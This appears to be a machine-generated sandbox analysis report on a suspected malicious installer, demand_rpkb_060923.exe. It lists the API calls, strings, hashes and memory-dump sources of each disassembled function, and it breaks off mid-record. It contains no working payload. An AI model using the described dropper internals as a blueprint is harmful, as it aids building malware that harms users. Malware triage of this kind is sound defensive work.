Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\demand_rpkb_060923.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3131300722
Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040216B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2

Strings

C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6, xrefs: 00402230

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6
API String ID: 123533781-8972102
Opcode ID: 63d13577d95dfe47f1597fb3340e824aabbeb411552e4c6402c57dda5b8448f1
Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
Opcode Fuzzy Hash: 63d13577d95dfe47f1597fb3340e824aabbeb411552e4c6402c57dda5b8448f1
Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004027A1 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 8be79d1f1699ea15cdc2691e436ba9b910a3039927bcb7b9d10ff040b247066e
Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
Opcode Fuzzy Hash: 8be79d1f1699ea15cdc2691e436ba9b910a3039927bcb7b9d10ff040b247066e
Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A

Uniqueness

Uniqueness Score: -1.00%

Function 00406945 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0040711C Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404B80 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00404B97
GetDlgItem.USER32 ref: 00404BA4
GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
LoadImageA.USER32 ref: 00404C0A
SetWindowLongA.USER32 ref: 00404C24
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
DeleteObject.GDI32(00000110), ref: 00404C81
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82

Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
GetWindowLongA.USER32 ref: 00404DC4
SetWindowLongA.USER32 ref: 00404DD2
ShowWindow.USER32(?,00000005), ref: 00404DE2
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
ImageList_Destroy.COMCTL32(00000000), ref: 00404FB0
GlobalFree.KERNEL32 ref: 00404FC0
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
ShowWindow.USER32(?,00000000), ref: 00405169
GetDlgItem.USER32 ref: 00405174
ShowWindow.USER32(00000000), ref: 0040517B

Strings

M, xrefs: 00404D3A
N, xrefs: 00404E1B
, xrefs: 00405153

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 9c9edc283e25dc213d4f824251f13dff68fe0008e79e33de9b0021577515009d
Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
Opcode Fuzzy Hash: 9c9edc283e25dc213d4f824251f13dff68fe0008e79e33de9b0021577515009d
Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004042E6 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32 ref: 00404371
GetDlgItem.USER32 ref: 00404385
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
GetSysColor.USER32(?), ref: 004043B4
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
lstrlenA.KERNEL32(?), ref: 004043D5
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
GetDlgItem.USER32 ref: 0040445B
SendMessageA.USER32(00000000), ref: 0040445E
GetDlgItem.USER32 ref: 00404489
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
LoadCursorA.USER32 ref: 004044D8
SetCursor.USER32(00000000), ref: 004044E1
LoadCursorA.USER32 ref: 004044F7
SetCursor.USER32(00000000), ref: 004044FA
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam, xrefs: 004044B4
N, xrefs: 00404477

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam$N
API String ID: 3103080414-3426013026
Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Arbejdsdatabasens Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Arbejdsdatabasens Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: Arbejdsdatabasens Setup$F
API String ID: 941294808-2313687778
Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405D66 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
GetShortPathNameA.KERNEL32 ref: 00405DA0

Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37

GetShortPathNameA.KERNEL32 ref: 00405DBD
wsprintfA.USER32 ref: 00405DDB
GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
GlobalFree.KERNEL32 ref: 00405EC4
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB

Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\demand_rpkb_060923.exe,80000000,00000003), ref: 00405C94
Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

Strings

[Rename], xrefs: 00405E45, 00405E57
%s=%s, xrefs: 00405DD1

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 536ded58655ee36161f9cc370f0aa634966da8d6c53cbb0260df3f09f937f884
Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
Opcode Fuzzy Hash: 536ded58655ee36161f9cc370f0aa634966da8d6c53cbb0260df3f09f937f884
Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD

Uniqueness

Uniqueness Score: -1.00%

Function 004063D2 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\demand_rpkb_060923.exe",745CFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
CharNextA.USER32(?,"C:\Users\user\Desktop\demand_rpkb_060923.exe",745CFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
CharPrevA.USER32(?,?,745CFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 004063D3
*?|<>/":, xrefs: 0040641A
"C:\Users\user\Desktop\demand_rpkb_060923.exe", xrefs: 0040640E

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\demand_rpkb_060923.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-1883736089
Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD

Uniqueness

Uniqueness Score: -1.00%

Function 004041E2 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32 ref: 004041FF
GetSysColor.USER32(00000000), ref: 0040423D
SetTextColor.GDI32(?,00000000), ref: 00404249
SetBkMode.GDI32(?,?), ref: 00404255
GetSysColor.USER32(?), ref: 00404268
SetBkColor.GDI32(?,?), ref: 00404278
DeleteObject.GDI32(?), ref: 00404292
CreateBrushIndirect.GDI32(?), ref: 0040429C

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00404ACE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
GetMessagePos.USER32 ref: 00404AF1
ScreenToClient.USER32 ref: 00404B0B
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43

Strings

f, xrefs: 00404B1F

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
